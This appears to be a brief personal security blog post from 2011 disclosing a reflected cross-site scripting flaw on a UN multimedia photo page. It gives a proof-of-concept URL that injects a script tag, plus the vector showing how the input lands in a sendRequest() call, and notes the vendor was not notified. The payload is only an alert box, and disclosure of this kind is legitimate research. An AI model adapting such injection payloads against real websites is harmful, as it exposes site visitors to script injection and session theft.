This site is my sandbox. I post security vulnerabilities I discover, project updates, and the occasional rant. Comments are usually disabled, but if you need to contact me, I am sure you will find a way to.
21
Mar 11

UN Multimedia

Date: Mar-21-2011
Vendor Notified: No
Proof of Concept:
http://www.unmultimedia.org/photo/detail.jsp?id=403/403478&key=2&query=%3C/script%3E%22%3E%3Cscript%3Ealert%280%29%3C/script%3E

 

Vectors:

  • <script type="text/javascript"> sendRequest('2', '2', '</script>"><script>alert(0)</script>', '', ''); </script>

Comments are closed.

Archives

Categories


Copyright © 2012 benburns.org
WordPress, sucka. Theme by Theme Lab